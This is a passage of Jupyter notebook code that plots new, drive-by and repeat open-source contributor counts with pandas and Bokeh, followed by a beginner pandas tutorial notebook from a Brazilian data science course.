{} or more contributions in {} days and their first contribution is in the specified time period. New contributors are individuals who make their first contribution in the specified time period.""" elif contributor_type == 'drive_by': #create list of 'cntrb_ids' for repeat contributors repeat_cntrb_ids = repeats_df['cntrb_id'].to_list() #create df with all contributors other than the ones in the repeats_df driver_df = driver_df.loc[~driver_df['cntrb_id'].isin(repeat_cntrb_ids)] #filter df so it only includes the first contribution driver_df = driver_df.loc[driver_df['rank'] == 1] caption = """This graph shows drive by contributors in the specified time period. Drive by contributors are contributors who make less than the required {} contributions in {} days. New contributors are individuals who make their first contribution in the specified time period. Of course, then, “All drive-by’s are by definition first time contributors”. However, not all first time contributors are drive-by’s.""" elif contributor_type == 'All': if rank == 1: #makes df with all first time contributors driver_df = driver_df.loc[driver_df['rank'] == 1] caption = """This graph shows all the first time contributors, whether they contribute once, or contribute multiple times. New contributors are individuals who make their first contribution in the specified time period.""" if rank == 2: #creates df with all second time contributors driver_df = driver_df.loc[driver_df['rank'] == 2] caption = """This graph shows the second contribution of all first time contributors in the specified time period.""" y_axis_label = 'Second Time Contributors' #filter by end_date, this is not done with the begin date filtering because a repeat contributor will look like drive-by if the second contribution is removed by end_date filtering mask = (driver_df['yearmonth'] < end_date) driver_df = driver_df.loc[mask] #adds all months to driver_df so the lists of dates will include all months and years driver_df = pd.concat([driver_df, months_df]) data = pd.DataFrame() if group_by == 'year': data['dates'] = driver_df[group_by].unique() #new contributor counts for y-axis data['new_contributor_counts'] = driver_df.groupby([group_by]).sum().reset_index()[y_axis] #used to format x-axis and title group_by_format_string = "Year" elif group_by == 'quarter' or group_by == 'month': #set variables to group the data by quarter or month if group_by == 'quarter': date_column = 'quarter' group_by_format_string = "Quarter" elif group_by == 'month': date_column = 'yearmonth' group_by_format_string = "Month" #modifies the driver_df[date_column] to be a string with year and month, then finds all the unique values data['dates'] = np.unique(np.datetime_as_string(driver_df[date_column], unit = 'M')) #new contributor counts for y-axis data['new_contributor_counts'] = driver_df.groupby([date_column]).sum().reset_index()[y_axis] #if the data set is large enough it will dynamically assign the width, if the data set is too small it will by default set to 870 pixel so the title fits if len(data['new_contributor_counts']) >= 15: plot_width = 46 * len(data['new_contributor_counts']) else: plot_width = 870 #create a dict convert an integer number into a word #used to turn the rank into a word, so it is nicely displayed in the title numbers = ['Zero', 'First', 'Second'] num_conversion_dict = {} for i in range(1, len(numbers)): num_conversion_dict[i] = numbers[i] number = '{}'.format(num_conversion_dict[rank]) #define pot for bar chart p = figure(x_range=data['dates'], plot_height=400, plot_width = plot_width, title=title.format(repo_dict[repo_id], contributor_type.capitalize(), number, group_by_format_string), y_range=(0, max(data['new_contributor_counts'])* 1.15), margin = (0, 0, 10, 0)) p.vbar(x=data['dates'], top=data['new_contributor_counts'], width=0.8) source = ColumnDataSource(data=dict(dates=data['dates'], new_contributor_counts=data['new_contributor_counts'])) #add contributor_count labels to chart p.add_layout(LabelSet(x='dates', y='new_contributor_counts', text='new_contributor_counts', y_offset=4, text_font_size="13pt", text_color="black", source=source, text_align='center')) p.xgrid.grid_line_color = None p.y_range.start = 0 p.axis.minor_tick_line_color = None p.outline_line_color = None p.title.align = "center" p.title.text_font_size = "18px" p.yaxis.axis_label = 'Second Time Contributors' if rank == 2 else 'New Contributors' p.xaxis.axis_label = group_by_format_string p.xaxis.axis_label_text_font_size = "18px" p.yaxis.axis_label_text_font_size = "16px" p.xaxis.major_label_text_font_size = "16px" p.xaxis.major_label_orientation = 45.0 p.yaxis.major_label_text_font_size = "16px" plot = p #creates plot to hold caption p = figure(width = plot_width, height=200, margin = (0, 0, 0, 0)) p.add_layout(Label( x = 0, # Change to shift caption left or right y = 160, x_units = 'screen', y_units = 'screen', text='{}'.format(caption.format(num_contributions_required, time)), text_font = 'times', # Use same font as paper text_font_size = '15pt', render_mode='css' )) p.outline_line_color = None caption_plot = p #puts plots together into a grid grid = gridplot([[plot], [caption_plot]]) show(grid) if save_files: output_file = 'images/' + 'new_contributors_stacked_bar' + '_' + contributor_type + '_' + group_by + '_' + repo_dict[repo_id] + '.png' export_png(grid, filename=output_file) #vertical_bar_chart(df, months_df, repo_id =25502, group_by = group_by, required_contributions = num_contributions_required, required_time = time) ``` ### New Contributors Action Stacked Bar Chart ``` def vertical_stacked_bar_chart(input_df, months_df, repo_id, group_by, y_axis='new_contributors', title = "{}: {} {} Time Contributors Per {}", required_contributions = 4, required_time = 5): contributor_types = ['All', 'repeat', 'drive_by'] ranks = [1,2] #determine if a list or integer is the input, and create a list if type(repo_id) == type(repo_list): repo_ids = repo_id else: repo_ids = [repo_id] for rank in ranks: for contributor_type in contributor_types: #do not display these visualizations since drive-by's do not have second contributions, and the second contribution of a repeat contributor is the same thing as the all the second time contributors if (rank == 2 and contributor_type == 'drive_by') or (rank == 2 and contributor_type == 'repeat'): continue #do not display these visualizations since drive-by's do not have second contributions, and the second contribution of a repeat contributor is the same thing as the all the second time contributors for repo_id in repo_ids: output_notebook() #create a copy of contributor dataframe driver_df = input_df.copy() #filter dataframe by repo_id driver_df = driver_df.loc[driver_df['repo_id'] == repo_id] #remove first time contributors before begin date, along with their second contribution mask = (driver_df['yearmonth'] < begin_date) driver_df= driver_df[~driver_df['cntrb_id'].isin(driver_df.loc[mask]['cntrb_id'])] #create separate repeat_df that includes all repeat contributors #then any contributor that is not in the repeat_df is a drive-by contributor repeats_df = driver_df.copy() #discards rows other than the first and the row required to be a repeat contributor repeats_df = repeats_df.loc[repeats_df['rank'].isin([1,required_contributions])] #removes all the contributors that only have a first contirbution repeats_df = repeats_df[repeats_df['cntrb_id'].isin(repeats_df.loc[driver_df['rank'] == required_contributions]['cntrb_id'])] #create lists of 'created_at' times for the final required contribution and the first contribution repeat_list = repeats_df.loc[driver_df['rank'] == required_contributions]['created_at'].tolist() first_list = repeats_df.loc[driver_df['rank'] == 1]['created_at'].tolist() #only keep first time contributions, since those are the dates needed for visualization repeats_df = repeats_df.loc[driver_df['rank'] == 1] #create list of time differences between the final required contribution and the first contribution, and add it to the df differences = [] for i in range(0, len(repeat_list)): time_difference = repeat_list[i] - first_list[i] total = time_difference.days * 86400 + time_difference.seconds differences.append(total) repeats_df['differences'] = differences #remove contributions who made enough contributions, but not in a short enough time repeats_df = repeats_df.loc[repeats_df['differences'] <= required_time * 86400] if contributor_type == 'repeat': driver_df = repeats_df caption = """This graph shows repeat contributors in the specified time period. Repeat contributors are contributors who have made {} or more contributions in {} days and their first contribution is in the specified time period. New contributors are individuals who make their first contribution in the specified time period.""" elif contributor_type == 'drive_by': #create list of 'cntrb_ids' for repeat contributors repeat_cntrb_ids = repeats_df['cntrb_id'].to_list() #create df with all contributors other than the ones in the repeats_df driver_df = driver_df.loc[~driver_df['cntrb_id'].isin(repeat_cntrb_ids)] #filter df so it only includes the first contribution driver_df = driver_df.loc[driver_df['rank'] == 1] caption = """This graph shows drive by contributors in the specified time period. Drive by contributors are contributors who make less than the required {} contributions in {} days. New contributors are individuals who make their first contribution in the specified time period. Of course, then, “All drive-by’s are by definition first time contributors”. However, not all first time contributors are drive-by’s.""" elif contributor_type == 'All': if rank == 1: #makes df with all first time contributors driver_df = driver_df.loc[driver_df['rank'] == 1] caption = """This graph shows all the first time contributors, whether they contribute once, or contribute multiple times. New contributors are individuals who make their first contribution in the specified time period.""" if rank == 2: #creates df with all second time contributor driver_df = driver_df.loc[driver_df['rank'] == 2] caption = """This graph shows the second contribution of all first time contributors in the specified time period.""" y_axis_label = 'Second Time Contributors' #filter by end_date, this is not done with the begin date filtering because a repeat contributor will look like drive-by if the second contribution is removed by end_date filtering mask = (driver_df['yearmonth'] < end_date) driver_df = driver_df.loc[mask] #adds all months to driver_df so the lists of dates will include all months and years driver_df = pd.concat([driver_df, months_df]) actions = ['open_pull_request', 'pull_request_comment', 'commit', 'issue_closed', 'issue_opened', 'issue_comment'] data = pd.DataFrame() if group_by == 'year': #x-axis dates data['dates'] = driver_df[group_by].unique() for contribution_type in actions: data[contribution_type] = pd.concat([driver_df.loc[driver_df['action'] == contribution_type], months_df]).groupby(group_by).sum().reset_index()[y_axis] #new contributor counts for all actions data['new_contributor_counts'] = driver_df.groupby([group_by]).sum().reset_index()[y_axis] #used to format x-axis and graph title group_by_format_string = "Year" elif group_by == 'quarter' or group_by == 'month': #set variables to group the data by quarter or month if group_by == 'quarter': date_column = 'quarter' group_by_format_string = "Quarter" elif group_by == 'month': date_column = 'yearmonth' group_by_format_string = "Month" #modifies the driver_df[date_column] to be a string with year and month, then finds all the unique values data['dates'] = np.unique(np.datetime_as_string(driver_df[date_column], unit = 'M')) #new_contributor counts for each type of action for contribution_type in actions: data[contribution_type] = pd.concat([driver_df.loc[driver_df['action'] == contribution_type], months_df]).groupby(date_column).sum().reset_index()[y_axis] #new contributor counts for all actions data['new_contributor_counts'] = driver_df.groupby([date_column]).sum().reset_index()[y_axis] #if the data set is large enough it will dynamically assign the width, if the data set is too small it will by default set to 870 pixel so the title fits if len(data['new_contributor_counts']) >= 15: plot_width = 46 * len(data['new_contributor_counts']) + 200 else: plot_width = 870 #create list of values for data source dict actions_df_references = [] for action in actions: actions_df_references.append(data[action]) #created dict with the actions as the keys, and the values as the values from the df data_source = {actions[i]: actions_df_references[i] for i in range(len(actions))} data_source.update( {'dates' : data['dates'], 'New Contributor Counts': data['new_contributor_counts']} ) colors = Colorblind[len(actions)] source = ColumnDataSource(data=data_source) #create a dict convert an integer number into a word #used to turn the rank into a word, so it is nicely displayed in the title numbers = ['Zero', 'First', 'Second'] num_conversion_dict = {} for i in range(1, len(numbers)): num_conversion_dict[i] = numbers[i] number = '{}'.format(num_conversion_dict[rank]) #y_max = 20 #creates plot to hold chart p = figure(x_range=data['dates'], plot_height=400, plot_width = plot_width, title=title.format(repo_dict[repo_id], contributor_type.capitalize(), number, group_by_format_string), toolbar_location=None, y_range=(0, max(data['new_contributor_counts'])* 1.15)) #max(data['new_contributor_counts'])* 1.15), margin = (0, 0, 0, 0)) vbar = p.vbar_stack(actions, x='dates', width=0.8, color=colors, source=source) #add total count labels p.add_layout(LabelSet(x='dates', y='New Contributor Counts', text='New Contributor Counts', y_offset=4, text_font_size="14pt", text_color="black", source=source, text_align='center')) #add legend legend = Legend(items=[(date, [action]) for (date, action) in zip(actions, vbar)], location=(0, 120), label_text_font_size = "16px") p.add_layout(legend, 'right') p.xgrid.grid_line_color = None p.y_range.start = 0 p.axis.minor_tick_line_color = None p.outline_line_color = None p.title.align = "center" p.title.text_font_size = "18px" p.yaxis.axis_label = 'Second Time Contributors' if rank == 2 else 'New Contributors' p.xaxis.axis_label = group_by_format_string p.xaxis.axis_label_text_font_size = "18px" p.yaxis.axis_label_text_font_size = "16px" p.xaxis.major_label_text_font_size = "16px" p.xaxis.major_label_orientation = 45.0 p.yaxis.major_label_text_font_size = "16px" plot = p #creates plot to hold caption p = figure(width = plot_width, height=200, margin = (0, 0, 0, 0)) p.add_layout(Label( x = 0, # Change to shift caption left or right y = 160, x_units = 'screen', y_units = 'screen', text='{}'.format(caption.format(num_contributions_required, time)), text_font = 'times', # Use same font as paper text_font_size = '15pt', render_mode='css' )) p.outline_line_color = None caption_plot = p #puts plots together into a grid grid = gridplot([[plot], [caption_plot]]) show(grid) if save_files: output_file = 'images/' + 'new_contributors_stacked_bar' + '_' + contributor_type + '_' + group_by + '_' + repo_dict[repo_id] + '.png' export_png(grid, filename=output_file) ``` ### Repeat and Drive By Contributor Counts Pie Chart ``` def pie_chart(input_df, repo_id, title = " {}: Number of Returning Contributors out of {} from {} to {}", required_contributions = 4, required_time = 5): if type(repo_id) == type(repo_list): repo_ids = repo_id else: repo_ids = [repo_id] for repo_id in repo_ids: output_notebook() #create a copy of contributor dataframe driver_df = input_df.copy() #filter dataframe by repo_id driver_df = driver_df.loc[driver_df['repo_id'] == repo_id] #remove first time contributors before begin date, along with their second contribution mask = (driver_df['yearmonth'] < begin_date) driver_df= driver_df[~driver_df['cntrb_id'].isin(driver_df.loc[mask]['cntrb_id'])] #determine if contributor is a drive by by finding all the cntrb_id's that do not have a second contribution repeats_df = driver_df.copy() repeats_df = repeats_df.loc[repeats_df['rank'].isin([1,required_contributions])] #removes all the contributors that only have a first contirbution repeats_df = repeats_df[repeats_df['cntrb_id'].isin(repeats_df.loc[driver_df['rank'] == required_contributions]['cntrb_id'])] repeat_list = repeats_df.loc[driver_df['rank'] == required_contributions]['created_at'].tolist() first_list = repeats_df.loc[driver_df['rank'] == 1]['created_at'].tolist() repeats_df = repeats_df.loc[driver_df['rank'] == 1] repeats_df['type'] = 'repeat' differences = [] for i in range(0, len(repeat_list)): time_difference = repeat_list[i] - first_list[i] total = time_difference.days * 86400 + time_difference.seconds differences.append(total) repeats_df['differences'] = differences repeats_df = repeats_df.loc[repeats_df['differences'] <= required_time * 86400] repeat_cntrb_ids = repeats_df['cntrb_id'].to_list() drive_by_df = driver_df.loc[~driver_df['cntrb_id'].isin(repeat_cntrb_ids)] drive_by_df = drive_by_df.loc[driver_df['rank'] == 1] drive_by_df['type'] = 'drive_by' driver_df = pd.concat([drive_by_df, repeats_df]) #filter df by end date mask = (driver_df['yearmonth'] < end_date) driver_df = driver_df.loc[mask] #first and second time contributor counts drive_by_contributors = driver_df.loc[driver_df['type'] == 'drive_by'].count()['new_contributors'] repeat_contributors = driver_df.loc[driver_df['type'] == 'repeat'].count()['new_contributors'] #create a dict with the # of drive-by and repeat contributors x = {'Drive_By': drive_by_contributors, 'Repeat' : repeat_contributors} #turn dict 'x' into a dataframe with columns 'contributor_type', and 'counts' data = pd.Series(x).reset_index(name='counts').rename(columns={'index':'contributor_type'}) data['angle'] = data['counts']/data['counts'].sum() * 2*pi data['color'] = ('#0072B2', '#E69F00') data['percentage'] = ((data['angle']/(2*pi))*100).round(2) #format title title = title.format(repo_dict[repo_id], drive_by_contributors + repeat_contributors, begin_date, end_date) title_text_font_size = 18 plot_width = 850 #sets plot_width to width of title if title is wider than 850 pixels if len(title) * title_text_font_size / 2 > plot_width: plot_width = int(len(title) * title_text_font_size / 2) source = ColumnDataSource(data) #creates plot for chart p = figure(plot_height=450, plot_width =plot_width, title=title, toolbar_location=None, x_range=(-0.5, 1.3), tools = 'hover', tooltips = "@contributor_type", margin = (0, 0, 0, 0)) wedge = p.wedge(x=0.87, y=1, radius=0.4, start_angle=cumsum('angle', include_zero=True), end_angle=cumsum('angle'), line_color=None, fill_color='color', legend_field='contributor_type', source=data) start_point = 0.88 for i in range(0, len(data['percentage'])): #percentages p.add_layout(Label(x=-0.17, y= start_point + 0.13*(len(data['percentage']) - 1 - i), text='{}%'.format(data.iloc[i]['percentage']), render_mode='css', text_font_size = '15px', text_font_style= 'bold')) #contributors p.add_layout(Label(x=0.12, y= start_point + 0.13*(len(data['percentage']) - 1 - i), text='{}'.format(data.iloc[i]['counts']), render_mode='css', text_font_size = '15px', text_font_style= 'bold')) #percentages header p.add_layout(Label(x=-0.22, y= start_point + 0.13*(len(data['percentage'])), text='Percentages', render_mode='css', text_font_size = '15px', text_font_style= 'bold')) #legend header p.add_layout(Label(x=-0.43, y= start_point + 0.13*(len(data['percentage'])), text='Category', render_mode='css', text_font_size = '15px', text_font_style= 'bold')) #contributors header p.add_layout(Label(x=0, y= start_point + 0.13*(len(data['percentage'])), text='# Contributors', render_mode='css', text_font_size = '15px', text_font_style= 'bold')) p.axis.axis_label=None p.axis.visible=False p.grid.grid_line_color = None p.title.align = "center" p.title.text_font_size = "{}px".format(title_text_font_size) p.legend.location = "center_left" p.legend.border_line_color = None p.legend.label_text_font_style = 'bold' p.legend.label_text_font_size = "15px" plot = p #creates plot for caption p = figure(width = 850, height=200, margin = (0, 0, 0, 0)) caption= """This pie chart shows the percentage of new contributors who were drive-by or repeat contributors. Drive by contributors are contributors who make less than the required {0} contributions in {1} days. New contributors are individuals who make their first contribution in the specified time period. Repeat contributors are contributors who have made {0} or more contributions in {1} days and their first contribution is in the specified time period.""" p.add_layout(Label( x = 0, y = 160, x_units = 'screen', y_units = 'screen', text='{}'.format(caption.format(num_contributions_required, time)), text_font = 'times', text_font_size = '15pt', render_mode='css' )) p.outline_line_color = None caption_plot = p #put graph and caption plot together into one grid grid = gridplot([[plot], [caption_plot]]) show(grid) if save_files: output_file = 'images/' + 'pie_chart' + '_' + repo_dict[repo_id] + '.png' export_png(grid, filename=output_file) ``` ### Repeat and Drive-by Contributor Counts Stacked Bar Chart ``` def vertical_stacked_bar_chart_2(input_df, months_df, repo_id, group_by, y_axis='new_contributors', title = "{}: Drive By and Repeat Contributor Counts per {}", required_contributions= 5, required_time=100): if type(repo_id) == type(repo_list): repo_ids = repo_id else: repo_ids = [repo_id] for repo_id in repo_ids: output_notebook() #create a copy of contributor dataframe driver_df = input_df.copy() #filter dataframe by repo_id driver_df = driver_df.loc[driver_df['repo_id'] == repo_id] #remove first time contributors before begin date, along with their second contribution mask = (driver_df['yearmonth'] < begin_date) driver_df= driver_df[~driver_df['cntrb_id'].isin(driver_df.loc[mask]['cntrb_id'])] #determine if contributor is a drive by by finding all the cntrb_id's that do not have a second contribution repeats_df = driver_df.copy() #discards rows other than the first and the row required to be a repeat contributor repeats_df = repeats_df.loc[repeats_df['rank'].isin([1,required_contributions])] #removes all the contributors that only have a first contirbution repeats_df = repeats_df[repeats_df['cntrb_id'].isin(repeats_df.loc[driver_df['rank'] == required_contributions]['cntrb_id'])] #create lists of 'created_at' times for the final required contribution and the first contribution repeat_list = repeats_df.loc[driver_df['rank'] == required_contributions]['created_at'].tolist() first_list = repeats_df.loc[driver_df['rank'] == 1]['created_at'].tolist() #only keep first time contributions, since there only needs to be one instance of each 'cntrb_id' in df repeats_df = repeats_df.loc[driver_df['rank'] == 1] repeats_df['type'] = 'repeat' #create list of time differences between the final required contribution and the first contribution, and add it to the df differences = [] for i in range(0, len(repeat_list)): time_difference = repeat_list[i] - first_list[i] total = time_difference.days * 86400 + time_difference.seconds differences.append(total) repeats_df['differences'] = differences #remove contributions who made enough contributions, but not in a short enough time repeats_df = repeats_df.loc[repeats_df['differences'] <= required_time * 86400] #create list of 'cntrb_ids' for repeat contributors repeat_cntrb_ids = repeats_df['cntrb_id'].to_list() #create df with all contributors other than the ones in the repeats_df drive_by_df = driver_df.loc[~driver_df['cntrb_id'].isin(repeat_cntrb_ids)] #filter df so it only includes the first contribution drive_by_df = drive_by_df.loc[driver_df['rank'] == 1] drive_by_df['type'] = 'drive_by' driver_df = pd.concat([drive_by_df, repeats_df, months_df]) #filter by end_date mask = (driver_df['yearmonth'] < end_date) driver_df = driver_df.loc[mask] #create df to hold data needed for chart data = pd.DataFrame() if group_by == 'year': #x-axis dates data['dates'] = driver_df[group_by].unique() data['repeat_counts'] = driver_df.loc[driver_df['type'] == 'repeat'].groupby(group_by).count().reset_index()[y_axis] data['drive_by_counts'] = driver_df.loc[driver_df['type'] == 'drive_by'].groupby(group_by).count().reset_index()[y_axis] #new contributor counts for all contributor counts total_counts = [] for i in range(0, len(data['drive_by_counts'])): total_counts.append(data.iloc[i]['drive_by_counts'] + data.iloc[i]['repeat_counts']) data['total_counts'] = total_counts #used to format x-axis and graph title group_by_format_string = "Year" #font size of drive by and repeat labels label_text_font_size = "14pt" elif group_by == 'quarter' or group_by == 'month': #set variables to group the data by quarter or month if group_by == 'quarter': date_column = 'quarter' group_by_format_string = "Quarter" elif group_by == 'month': date_column = 'yearmonth' group_by_format_string = "Month" #modifies the driver_df[date_column] to be a string with year and month, then finds all the unique values data['dates'] = np.unique(np.datetime_as_string(driver_df[date_column], unit = 'M')) data['drive_by_counts'] = pd.concat([driver_df.loc[driver_df['type'] == 'drive_by'], months_df]).groupby(date_column).sum().reset_index()[y_axis] data['repeat_counts'] = pd.concat([driver_df.loc[driver_df['type'] == 'repeat'], months_df]).groupby(date_column).sum().reset_index()[y_axis] #new contributor counts for all contributor types total_counts = [] for i in range(0, len(data['drive_by_counts'])): total_counts.append(data.iloc[i]['drive_by_counts'] + data.iloc[i]['repeat_counts']) data['total_counts'] = total_counts #font size of drive by and repeat labels label_text_font_size = "13pt" data_source = {'Dates' : data['dates'], 'Drive By' : data['drive_by_counts'], 'Repeat' : data['repeat_counts'], 'All' : data['total_counts']} groups = ["Drive By", "Repeat"] colors = ['#56B4E9', '#E69F00'] source = ColumnDataSource(data=data_source) #format title title_text_font_size = 18 title = title.format(repo_dict[repo_id], group_by_format_string) #if the data set is large enough it will dynamically assign the width, if the data set is too small it will by default set to 780 pixel so the title fits if len(data['total_counts']) >= 13: plot_width = 46 * len(data['total_counts']) + 210 else: plot_width = 780 p = figure(x_range=data['dates'], plot_height=500, plot_width = plot_width, title=title, toolbar_location=None, y_range=(0, max(total_counts)* 1.15), margin = (0, 0, 0, 0)) vbar = p.vbar_stack(groups, x='Dates', width=0.8, color=colors, source=source) #add total counts above bars p.add_layout(LabelSet(x='Dates', y='All', text='All', y_offset=8, text_font_size="14pt", text_color="black", source=source, text_align='center')) #add drive by count labels p.add_layout(LabelSet(x='Dates', y='Drive By', text='Drive By', y_offset=-22, text_font_size=label_text_font_size, text_color="black", source=source, text_align='center')) #add repeat count labels p.add_layout(LabelSet(x='Dates', y='All', text='Repeat', y_offset=-22, text_font_size=label_text_font_size, text_color="black", source=source, text_align='center')) #add legend legend = Legend(items=[(date, [group]) for (date, group) in zip(groups, vbar)], location=(0, 200), label_text_font_size = "16px") p.add_layout(legend, 'right') p.xgrid.grid_line_color = None p.y_range.start = 0 p.axis.minor_tick_line_color = None p.outline_line_color = None p.title.align = "center" p.title.text_font_size = "{}px".format(title_text_font_size) p.yaxis.axis_label = '# Contributors' p.xaxis.axis_label = group_by_format_string p.xaxis.axis_label_text_font_size = "18px" p.yaxis.axis_label_text_font_size = "16px" p.xaxis.major_label_text_font_size = "16px" p.xaxis.major_label_orientation = 45.0 p.yaxis.major_label_text_font_size = "16px" p.legend.label_text_font_size = "20px" plot = p #add plot to hold caption p = figure(width = plot_width, height=200, margin = (0, 0, 0, 0)) caption = """This graph shows the number of new contributors in the specified time period, and indicates how many were drive-by and repeat contributors. Drive by contributors are contributors who make less than the required {0} contributions in {1} days. New contributors are individuals who make their first contribution in the specified time period. Repeat contributors are contributors who have made {0} or more contributions in {1} days and their first contribution is in the specified time period.""" p.add_layout(Label( x = 0, y = 160, x_units = 'screen', y_units = 'screen', text='{}'.format(caption.format(num_contributions_required, time)), text_font = 'times', text_font_size = '15pt', render_mode='css' )) p.outline_line_color = None caption_plot = p #put graph and caption plot together into one grid grid = gridplot([[plot], [caption_plot]]) show(grid) if save_files: output_file = 'images/' + 'repeat_and_drive_by_stacked_bar' + '_' + group_by + '_' + repo_dict[repo_id] + '.png' export_png(grid, filename=output_file) ``` ### Function Calls to Create Report ``` if display_grouping == 'repo': for repo_id in repo_set: vertical_bar_chart(df, months_df, repo_id = repo_id, group_by = group_by, required_contributions = num_contributions_required, required_time = time) vertical_stacked_bar_chart(df, months_df, repo_id = repo_id, group_by = group_by, required_contributions = num_contributions_required, required_time = time) pie_chart(df, repo_id=repo_id, required_contributions = num_contributions_required, required_time = time) vertical_stacked_bar_chart_2(df, months_df,repo_id = repo_id, group_by = group_by, required_contributions = num_contributions_required, required_time = time) elif display_grouping == 'competitors': vertical_bar_chart(df, months_df, repo_id = repo_list, group_by = group_by, required_contributions = num_contributions_required, required_time = time) vertical_stacked_bar_chart(df, months_df, repo_id = repo_list , group_by = group_by, required_contributions = num_contributions_required, required_time = time) pie_chart(df, repo_id=repo_list, required_contributions = num_contributions_required, required_time = time) vertical_stacked_bar_chart_2(df, months_df,repo_id = repo_list, group_by = group_by, required_contributions = num_contributions_required, required_time = time) ```
github_jupyter
# AceleraDev Codenation - Semana 2 ### Túlio Vieira de Souza | Data Scientist ## Manipulando Dados (Pré-Processamento) #### 1. Importando as Bibliotecas Necessárias ``` #Importing libraries import pandas as pd import numpy as np #Acessing the help from pandas (pd) package pd? ``` #### 2. Manipulando Dicionários ``` #Creating a dictionary with data dados = {'canal_venda' : ['facebook', 'twitter', 'instagram', 'linkedin', 'facebook'], 'acessos': [100, 200, 300 ,400, 500], 'site': ['site1', 'site1', 'site2', 'site2', 'site3'], 'vendas': [1000.52, 1052.34, 2002, 5000, 300]} #Showing the 'dados' dictionary created dados #Checking the type from the variable 'dados' type(dados) #Acessing the keys from the 'dados' dictionary dados.keys() #Acessing a specific key in the 'dados' dictionary (In this case, the key 'site') dados['site'] #Acessing a specific position from a specific key in the 'dados' dictionary (In this case, the position 2) dados['acessos'][2] #Acessing another specific position from a specific key in the 'dados' dictionary (In this case, the position 3) dados['canal_venda'][3] #Acessing a specific positions from a specific key in the 'dados' dictionary (In this case, the positions 0, 1, 2) dados['canal_venda'][:3] ``` #### 3. Manipulando Listas ``` #Creating a list named 'lista' lista = [200, 200, 300, 800, 200] #Checking the type from the 'lista' variable type([1,2,3]) #Showing the 'lista' list lista #Picking a specific value from the 'lista' list lista[1] #Picking a slice of values from the 'lista list lista[:3] #Adding the 'lista' list to the 'dados' dictionary dados['lista'] = lista #Showing the updated 'dados' dictionary dados ``` #### 4. Manipulando DataFrames ``` #Creating a dataframe named 'dataframe' from the 'dados' dictionary dataframe = pd.DataFrame(dados) #Showing the 'dataframe' dataframe dataframe #Showing the 2 first rows from the 'dataframe' dataframe dataframe.head(2) #Checking the format (number of rows and columns) from the 'dataframe' dataframe dataframe.shape #Checking the index from the 'dataframe' dataframe dataframe.index #Checking the types from the data columns presenting in the 'dataframe' dataframe dataframe.dtypes #Counting the types from the data columns presenting in the 'dataframe' dataframe dataframe.dtypes.value_counts() #Checking for NaN (Not a Number) values in the 'dataframe' dataframe dataframe.isna() #Sum all the NaN (Not a Number) values in the columns from 'dataframe' dataframe dataframe.isna().sum() #Showing the columns names from the 'dataframe' dataframe dataframe.columns #Showing a specific column from the 'dataframe' dataframe dataframe['canal_venda'] #Creating and showing a new column in the 'dataframe' dataframe dataframe['nova_coluna'] = [1, 2, 3, 4, 5] dataframe #Showing the new columns names from the 'dataframe' dataframe dataframe.columns #Showing the 'dataframe' dataframe without some columns (In this case, the columns 'acessos', 'site', 'canal_venda)') dataframe.drop(columns=['acessos', 'site', 'canal_venda']) #Removing the 'nova_coluna' column from the dataframe dataframe.drop(columns='nova_coluna', inplace=True) dataframe #Showing again the columns from the 'dataframe' dataframe dataframe.columns #Acessing a specific value from a specific column named 'acessos' in the 'dataframe' dataframe dataframe['acessos'][1] #Acessing a specific slice from a specific column named 'canal_venda' in the 'dataframe' datafrane dataframe['canal_venda'][:2] #Slicing the data from 'dataframe' dataframe with iloc[rows, columns] dataframe.iloc[3:,:] #Slicing the data from 'dataframe' dataframe with the index loc[rows] dataframe.loc[:2] #Showing specific columns from the 'dataframe' dataframe dataframe[['canal_venda', 'vendas']] #Passing a filter of the 'dataframe' dataframe in a list filtro = ['canal_venda', 'acessos'] #Showing the 'dataframe' dataframe with the filter dataframe[filtro] #Using the info() method dataframe.info() #Showing the default 'dataframe' dataframe dataframe #Pivoting the data in 'dataframe' dataframe aux = dataframe.pivot(index = 'canal_venda', columns='site', values='acessos') #Using the info() method in the 'aux' dataframe aux.info() #Completing the NaN values with the fillna method #Pivoting the data from the 'aux' dataframe aux = dataframe.pivot(index='canal_venda', columns='site', values='acessos').fillna(0) dataframe.pivot(index='canal_venda', columns='site', values='acessos').fillna(0) #Changing the columns using the melt() function dataframe.melt(id_vars='site', value_vars=['canal_venda']) #Reseting the index from the 'aux' dataframe print(aux.columns) aux = aux.reset_index() print(aux.columns) #Showing the new 'aux' dataframe aux #Example of the melt() function aux.melt(id_vars='canal_venda', value_vars=['site1', 'site2', 'site3']) #Adding the columns from the 'dataframe' dataframe dataframe.sum() #Adding the rows from the 'dataframe' dataframe dataframe.sum(axis=1) #Showing the 'dataframe' dataframe dataframe #Calculating the median (mediana) of numeric columns in the 'dataframe' dataframe print('Row:\n', dataframe.median(axis=1)) print('Column:\n', dataframe.median()) #Calculating the mean (média) of numeric columns in the 'dataframe' dataframe dataframe.mean() #Calculating the standard deviation (desvio padrão) of numeric columns in the 'dataframe' dataframe dataframe.std() #Calculating the mode (moda) of numeric columns in the 'dataframe' dataframe dataframe.mode() #Calculating the descriptive statistics from the numeric columns in the 'dataframe' dataframe using describe() dataframe.describe() #Calculating the maximum (máximo) value from each numeric columns in the 'dataframe' dataframe dataframe.max() #Calculating the minimum (mínimo) value from each numeric columns in the 'dataframe' dataframe dataframe.min() #Showing the unique values from a specific column from the 'dataframe' dataframe dataframe['site'].unique() #Showing the number of unique values from each column in the 'dataframe' dataframe dataframe.nunique() #Counting the unique values from a specific column from the 'dataframe' dataframe dataframe['canal_venda'].value_counts() #Using groupby with the numeric values and sum dataframe.groupby('site')['acessos'].sum() #Using groupby with the numeric values and median dataframe.groupby('canal_venda')['acessos'].median() #Using groupby with categories values and unique dataframe.groupby('site')['canal_venda'].unique() #Using groupy with categories values and first dataframe.groupby('site')['canal_venda'].first() #Using groupby with the aggregation function dataframe.groupby('canal_venda').agg({'site':'unique', 'acessos':'sum'}) #Correlation between variables (features) dataframe.corr(method='spearman') #Showing the 'dataframe' dataframe dataframe #Creating categorical variables by numeric variable slice dataframe['categoria_vendas'] = pd.cut(dataframe['vendas'], bins= (0, 1500, 2000, 8000), labels = ('0 a 1500', '1500 a 2000', '2000 a 8000')) dataframe #Creating categorical variable using list compression dataframe['categoria_acessos'] = ['maior_que_300' if x > 300 else 'menor_que_300' for x in dataframe['acessos']] dataframe #Creating a second dataframe dataframe_2 = pd.DataFrame({'site': ['site1', 'site1', 'site2', 'site2', 'site3'], 'suporte': ['Carlos', 'Carlos', 'Maria', 'Maria', 'Ezequiel']}) #Merging the two dataframes ('dataframe' and 'dataframe_2') dataframe.merge(dataframe_2, on='site', how='left') ``` #### 5. Manipulando Arquivos .csv ``` 